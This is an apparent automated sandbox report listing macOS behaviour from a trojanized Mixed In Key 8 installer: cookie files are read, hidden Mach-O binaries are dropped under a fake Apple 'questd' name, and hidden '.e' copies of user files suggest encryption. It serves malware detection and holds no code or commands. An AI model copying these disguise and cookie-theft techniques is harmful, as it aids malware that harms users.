Source: /Library/mixednkey/toolroomd (PID: 639)	Binary cookie file read: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Cookies/Cookies.binarycookies
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Binary cookie file read: /Users/berri/Library/Cookies/Cookies.binarycookies
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Binary cookie file read: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Cookies/Cookies.binarycookies

Writes Mach-O files to untypical directories

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	64-bit Mach-O written to unusual path: /Users/berri/Library/.b0MbtGgfS	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	64-bit Mach-O written to unusual path: /Users/berri/Library/AppQuest/com.apple.questd
Source: /Library/AppQuest/com.apple.questd (PID: 647)	64-bit Mach-O written to unusual path: /Users/berri/Library/AppQuest/com.apple.questd	Jump to dropped file

Source: /Library/mixednkey/toolroomd (PID: 639)	Permissions modified for written 64-bit Mach-O /Users/berri/Library/.b0MbtGgfS: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	Permissions modified for written 64-bit Mach-O /Library/AppQuest/com.apple.questd: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	Permissions modified for written 64-bit Mach-O /Users/berri/Library/AppQuest/com.apple.questd: bits: - usr: rx grp: rx all: rwx
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Permissions modified for written 64-bit Mach-O /Users/berri/Library/AppQuest/com.apple.questd: bits: - usr: rx grp: rx all: rwx	Jump to dropped file

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Bundle Info.plist File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_67hLCP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Bundle Info.plist File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_XtQ91r -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Bundle Info.plist File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/.BC.T_yHpOuA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Info.plist	Jump to behavior

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Bundle code signature resource File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/_CodeSignature/.BC.T_VyYT4E -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/_CodeSignature/CodeResources			Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Bundle code signature resource File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/.BC.T_PbHFVL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResources			Jump to behavior

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.sandbox/.dat.nosync026b.4vCHV2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.sandbox/.SessionUUID	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe//Scripts/.BC.T_87I5M0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe//Scripts/._postinstall__	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe//.BC.T_Bl5A7Q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe//._postinstall__	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden File moved: /var/db/.dat.nosync026b.2FVXZ6 -> /var/db/.InstallerLockedApps.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/.BC.D_IJyznX -> Versions/Current/MIKToolkit	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/.BC.D_bbz0jP -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/.BC.D_ZMD8aI -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_2QfnGh -> Versions/Current/PrivateHeaders	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_YO8eK1 -> Versions/Current/MIKMIDI	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_sJWwud -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/.BC.D_Q7fOw1 -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_i3H8xw -> Versions/Current/Headers	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_JhoKg9 -> Versions/Current/Modules	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_OBeNME -> Versions/Current/MIKAnalysis	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_KfR2XP -> Versions/Current/PrivateHeaders	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_O6LUzC -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/.BC.D_Wp6Y7p -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_hTlAHm -> Versions/Current/Headers	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/.BC.D_TnZPhD -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/.BC.D_tSpw03 -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.D_Lwehu0 -> fr.lproj	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.D_eXg577 -> pt_BR.lproj	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/.BC.D_2uVg4D -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/.BC.D_OdIsrP -> Versions/Current/Sparkle	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/.BC.D_ffKXD8 -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/.BC.D_sJGCnS -> Versions/Current/XPCServices	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/.BC.D_ldmySq -> Versions/Current/MIKUpdate	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_4ARxPQ -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/.BC.D_xkYxLh -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_t6uISM -> Versions/Current/Headers	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_x4wYYv -> Versions/Current/MIKData	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_Ta1gx5 -> Versions/Current/Modules	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_F3Zz8z -> Versions/Current/MIKTag	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_Jp94Ty -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_8I9yxG -> Versions/Current/TagLib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_5rksgy -> Versions/Current/PrivateHeaders	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_jyo7sd -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/.BC.D_qZsvso -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/.BC.D_v3GXHr -> Versions/Current/Headers	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/.BC.D_nUx0vF -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_Qwwa5F -> Versions/Current/Headers	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_jOOFYn -> Versions/Current/Modules	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/.BC.D_epX5rL -> Versions/Current/DanceabilityAudioEngine	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/.BC.D_DNd0rz -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/.BC.D_98wah1 -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_SBVZDO -> Versions/Current/Resources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/.BC.D_aZpj8b -> A	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/.BC.D_VcYn6z -> Versions/Current/MIKAudio	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor (PID: 631)	Hidden File created: /var/db/.dat.nosync0277.gybxWI	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor (PID: 631)	Hidden File moved: /var/db/.dat.nosync0277.gybxWI -> /var/db/.InstallerTMExcludes.plist	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/.b0MbtGgfS	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.ncspot	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/..CFUserTextEncoding.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.0ACF1266-122A-4730-BFD0-867CC672C2A0.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.0ACF1266-122A-4730-BFD0-867CC672C2A0.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.0D642B43-9BB3-488B-80BD-D05FB68E4734.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.1DB5D13B-EACB-4682-B24B-3BF03D1C8158.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.20B81DCB-1DD8-44AC-B8F3-B1BEFDBB8F8B.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.20B81DCB-1DD8-44AC-B8F3-B1BEFDBB8F8B.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.28E0383D-4BF4-4BA9-ACA9-48F75870E979.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.28E0383D-4BF4-4BA9-ACA9-48F75870E979.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.2B0C6524-704B-43C0-B3BA-070EA2C35A52.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.2B0C6524-704B-43C0-B3BA-070EA2C35A52.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.3113CAFA-7936-427F-AFB4-559C95AD7B13.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.3113CAFA-7936-427F-AFB4-559C95AD7B13.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.3C05F24B-D303-483D-AC12-ECD1041930EB.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.3C05F24B-D303-483D-AC12-ECD1041930EB.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.3F4F72D9-982B-4DDE-BE57-0F410DB9FD5D.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.3F4F72D9-982B-4DDE-BE57-0F410DB9FD5D.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.44E5E857-A87B-40B0-9C16-BE47EEE10853.history.e	Jump to behavior
